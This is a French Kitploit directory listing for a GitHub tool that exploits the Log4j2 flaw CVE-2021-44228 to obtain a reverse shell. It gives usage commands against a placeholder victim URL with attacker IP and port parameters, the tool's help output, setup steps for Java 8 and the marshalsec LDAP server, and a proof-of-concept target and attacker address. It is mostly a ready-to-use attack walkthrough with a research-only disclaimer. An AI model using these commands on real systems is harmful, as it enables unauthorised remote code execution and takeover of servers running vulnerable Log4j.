Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Log4j2-CVE-2021-44228-revshell — Log4j2 CVE-2021-44228 revshell, bien sûr que ça craint !! | Kitploit
Outils/GitHubGitHub/faisalfs10x/log4j2-cve-2021-44228-revshell
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubfaisalfs10x/log4j2-cve-2021-44228-revshell

Log4j2-CVE-2021-44228-revshell

Log4j2 CVE-2021-44228 revshell, bien sûr que ça craint !!

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
182il y a 4 ansPas encore vérifié

Log4j2-CVE-2021-44228-revshell

Utilisation

root@kitploit:~
Pour un reverse shell :
$~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [AttackerPort] -hp [HTTPServerPort]

Pour vérifier si exploitable :
$~ python3 Log4j2-revshell.py -M check -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [AttackerPort]

$~  python3 Log4j2-revshell.py -h
    usage: Log4j2-revshell.py [-h] -M MODE -u TARGET -l LHOST -p LPORT
                              [-hp HTTPPORT] [-V]

    Log4j2 CVE-2021-44228 Reverse Shell

    arguments optionnels :
      -h, --help            affiche ce message d'aide et quitte
      -M MODE, --mode MODE  Mode : check | rev
      -u TARGET, --target TARGET
                            URL complète de la cible, http://www.victimLog4j.xyz:8080
      -l LHOST, --lhost LHOST
                            IP de l'attaquant pour recevoir le reverse shell
      -p LPORT, --lport LPORT
                            Port de l'attaquant pour recevoir le reverse shell
      -hp HTTPPORT, --httpport HTTPPORT
                            Port du serveur HTTP sur la machine de l'attaquant, défaut 8888
      -V, --version         affiche le numéro de version du programme et quitte

Prérequis

root@kitploit:~
1. Marshalsec jndi.LDAPRefServer # voir ici, https://github.com/mbechler/marshalsec
2. Java 8 # vous pouvez obtenir Java 8 ici https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html, 
   installation recommandée de jdk-8u181-linux-x64.tar.gz [Java 1.8.0_181]
3. Ce script, Log4j2-revshell.py

TLDR; Guide étape par étape

root@kitploit:~
$ Ouvrez le navigateur et téléchargez Java 8 depuis https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html 
  Dans la section Java SE Development Kit 8u181, sélectionnez jdk-8u181-linux-x64.tar.gz ou le paquet approprié selon votre OS.
    
$ sudo mkdir /usr/lib/jvm #Créez ce répertoire si vous ne l'avez pas encore
$ cd /usr/lib/jvm
$ sudo tar xzvf ~/Downloads/jdk-8u181-linux-x64.tar.gz #Extrayez le jdk-8u181-linux-x64.tar.gz téléchargé dans /usr/lib/jvm
$ sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_181/bin/java" 1
$ sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_181/bin/javac" 1
$ sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_181/bin/javaws" 1

$ sudo update-alternatives --set java /usr/lib/jvm/jdk1.8.0_181/bin/java
$ sudo update-alternatives --set javac /usr/lib/jvm/jdk1.8.0_181/bin/javac
$ sudo update-alternatives --set javaws /usr/lib/jvm/jdk1.8.0_181/bin/javaws
$ java -version #vérifiez si vous utilisez Java 1.8.0_181

$ git clone https://github.com/mbechler/marshalsec /tmp/Log4j2-dir; cd /tmp/Log4j2-dir #Installez marshalsec jndi.LDAPRefServer
$ sudo apt install -y maven #Construisez marshalsec avec le constructeur Java maven. Si vous n'avez pas maven, installez-le d'abord
$ mvn clean package -DskipTests #Construisez l'outil marshalsec avec maven 
$ cd /tmp/Log4j2-dir; wget -q https://raw.githubusercontent.com/faisalfs10x/Log4j2-CVE-2021-44228-revshell/main/Log4j2-revshell.py

$ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [AttackerPort] -hp [HTTPServerPort]

PoC

root@kitploit:~
hôte cible : http://192.168.5.122:8080
hôte attaquant : 192.168.5.120

https://user-images.githubusercontent.com/51811615/146068317-23af25f4-9e5b-42bb-960b-6775edd5be03.mp4

Testé sur

root@kitploit:~
- Ubuntu 18.04

Avertissement :

root@kitploit:~
Ce script est uniquement destiné à l'analyse de sécurité et à la recherche, par conséquent je ne serai pas tenu responsable s'il est utilisé pour des activités illicites.
Télécharger l’outil